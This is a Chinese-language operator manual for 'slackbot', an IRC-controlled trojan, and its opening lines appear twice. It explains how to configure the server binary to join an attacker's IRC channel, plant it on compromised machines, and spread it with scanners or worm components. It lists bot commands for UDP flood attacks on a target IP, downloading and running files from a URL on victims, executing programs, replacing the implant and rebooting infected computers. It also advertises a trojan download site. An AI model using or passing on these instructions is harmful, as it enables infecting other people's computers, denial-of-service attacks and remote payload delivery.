1:要有IRC的一点点知识 (没有的话不要看了)
第一:打开slackbot会有一下4个文件
sbconfig.exe(178k)------------------服务端设置文件
server.exe(9k)----------------------服务端(请务在自己机器运行)
slack.txt(5k)-----------------------使用帮助(本文件)
irccommamd.txt(20k)-----------------irc简单命令说明
我们打开sbconfig.exe然后用sbconfig.exe打开server.exe出现以下的东西
1,:要有IRC的一点点知识 (没有的话不要看了)
第一:打开slackbot会有一下4个文件
sbconfig.exe(178k)------------------服务端设置文件
server.exe(9k)----------------------服务端(请务在自己机器运行)
slack.txt(5k)-----------------------使用帮助(本文件)
irccommamd.txt(20k)-----------------irc简单命令说明
我们打开sbconfig.exe然后用sbconfig.exe打开server.exe出现以下的东西
用sbconfig.exe打开server.exe会出现
假如我们要拉马上sunnet.org的某个房间的话就这样(假设房间的名字是hack
我们就在sbconfig.exe的irc服务器里填sunnet.org然后房间就填hack
密码那里呢我们就填1234 验证也是1234(这个用来控制你的马!)
我们填好了以后呢要怎么做呢!对了我们刚刚已经用sbconfig.exe配置好了server.exe
配置好以后我们只需要server.exe
你只要在你的肉鸡上运行这个server.exe那么你的肉鸡就跟马一样拉到irc服务器
sunnet.org的hack房间了!
我们就找个IRC(我建议用mirc)然后用这个irc到房间里去!
我们先用 @验密码 1234 (@验密码 password)这个命令唤醒我们的马!然后怎么做呢?倒~~~~~~当然是跟骑士我一样骑马去杀敌啊!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
怎么样配置马比较快呢?给个提示用流光的种植者!或者用蠕虫病毒中的某个部分!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
以下是一些命令知识:
┌─────────────────┐
│更多木马软件、工具访问 木马帝国 │
│ 本站每天更新 斑竹在线解答 │
│ http://www.mmbest.com │
└─────────────────┘
slackbot中文版详细使用说明
首先去木马帝国下载slackbot中文版,地址是http://www.mmbest.com
解压后得到得到3个文件.
sbconfig.exe(178k)------------------服务端设置文件
server.exe(9k)----------------------服务端(请务在自己机器运行)
slack.txt(5k)-----------------------使用帮助(本文件)
irccommamd.txt(20k)-----------------irc简单命令说明
slackbot是一个没有客户端的木马,要使用他首先你要下载一个irc客户端软件,一般是mirc,此客户端也可以在木马帝国得到,目前最新版为5.91,mirc591的解压与安装同一般的共享软件.如果你以前没有用irc聊过天,建议你先熟悉irc的简单命令的操作.(附irc的命令简介)
在使用slackbot前,你首先得确定你得马儿将要连接的服务器和房间,比如服务器是irc.wz163.net 端口是 6667房间是 #木马帝国,这3项参数是必须的,你首先要去该服务器注册你的昵称和房间,使用[ /msg nickserv register 密码 邮件 ]可以注册昵称,使用[ /msg chanserv register #channel 密码 说明 ]可以注册一个房间,接着打开sbconfig.exe,
选文件--打开--然后选定server.exe--程序会加载服务端配置
服务器:当然是填你要马儿去的服务器了,比如 irc.wz163.net
端口: 可以用irc默认的6667或者其他的端口,看服务器的支持了.
服务器密码: 一般服务器都不设进入密码的,可以将这个钩去除
irc房间: 就是你刚才注册的那个房间了
密码: 这是关键,是你的马儿的控制密码,没有他你就没法控制你的马儿了
重复: 重复刚才填的密码
现在按保存就可以了.现在就是寻找目标了,至于你用冰河漏洞做目标还是用U漏洞做目标,我可不管了.请好自为之,不要太过分就好了.
当你的马儿运行服务端后,会很快连上你已经设定好的irc服务器的指定房间,你就在里面等着他吧,一般马儿会以随机的26个小写字母做昵称,很好认.slackbot是个用命令控制的木马,下面是他的命令行表示方式,你可以在公聊也可以在小窗使用命令.
***************************************************
以下的几个命令是无须验证密码都可以用的
@@看------------------这命令是看马儿的信息(主要是什么版本)
@@sysinfo-------------这命令是看感染了slackbot的电脑中用的是什么系统
@验密码 password------验证你的马的密码,password是你在设置服务器时自己设置的那个密码
****************************************************
以下的命令是要验证了密码后才可使用的命令
@验密码 password------验证服务端口令,这里的password就是你刚设的密码.
@@raw irc命令---------使用irc命令(例:@@raw join #Suck这命令使马儿进入一个叫#Suck的房间)
@说话 房间或某个 要说的话 ---------在房间内公开说话或对某个人发悄悄话
例:@说话 #Suck 杀了你 这命令使马儿在#Suck的房间说一句"杀了你"的话
例:@说话 Meteor 在吗? 这命令会给叫Meteor的在线聊友发一句"在吗?"的悄悄话
@@进入 #房间-----------进入一个房间
例:@@进入 #Meteor 这命令使马儿进入一个叫#Meteor的房间
@@part #房间-----------离开房间
例:@@part #Meteor 这命令使马儿离开#Meteor的房间
@@改名 新的名字--------改变昵称
例:@@改名 萧秋水 这命令使马儿的名字改为"萧秋水"
@@rndnick--------------随机改变昵称
@@cycle 次数 #房间-----变换昵称进出一个频道(慎用)
例:@@cycle 2 #Meteor 这命令使马儿退出#Meteor然后又进来,重复两次
@攻击 IP 发送的数据包数目 延迟时间 数据包大小-----------------udp远程攻击
例:@攻击 24.24.24.24 200 100 4096 这命令使马儿向24.24.24.24这个IP在100毫秒内发送200个每个大小为4096的udp数据包作为攻击
@@visit 次数 url---------访问指定url,可以增加自己主页的访问量
例:@@visit 5 http://www.yahoo.com 这命令使马儿访问http://www.yahoo.com五次
@@webdl ----------下载文件
例:@@webdl http://www.server.com/server.exe c:\server.exe 这命令使你的马儿从www.server.com中下载一个叫server.exe的文件,保存在马儿的c:\下
@执行 ---------------运行文件
例:@执行 c:\windows\notepad.exe 这命令在感染了slackbot的电脑上运行了notepad.exe的程序
@超级升级 ------------从指定url升级你的马
例:@超级升级 http://www.myweb.com/new.exe 这命令成功执行后,会将原来的slackbot的服务器从进程中杀掉,并将在注册表的键杀掉,然后执行你上载上去的那个new.exe文件。命令主要是用于升级你的马,有时因为你自己下马的房间被人发现了或者密码被人发现了,你就要重新再设置一个新的slackbot服务器,将房间改变或将密码改变,然后使用这个命令就可以将旧的slackbot服务器删掉,装入你新设置的那个服务器程序了。
@@reboot-------------------重启对方的电脑
@@restart------------------重启slackbot服务器程序
@@quit---------------------马儿退出irc服务器,要等重启后才会重新进入那个房间
@@exit---------------------退出irc服务器,将进程亦杀掉,但没有删除注册表的键值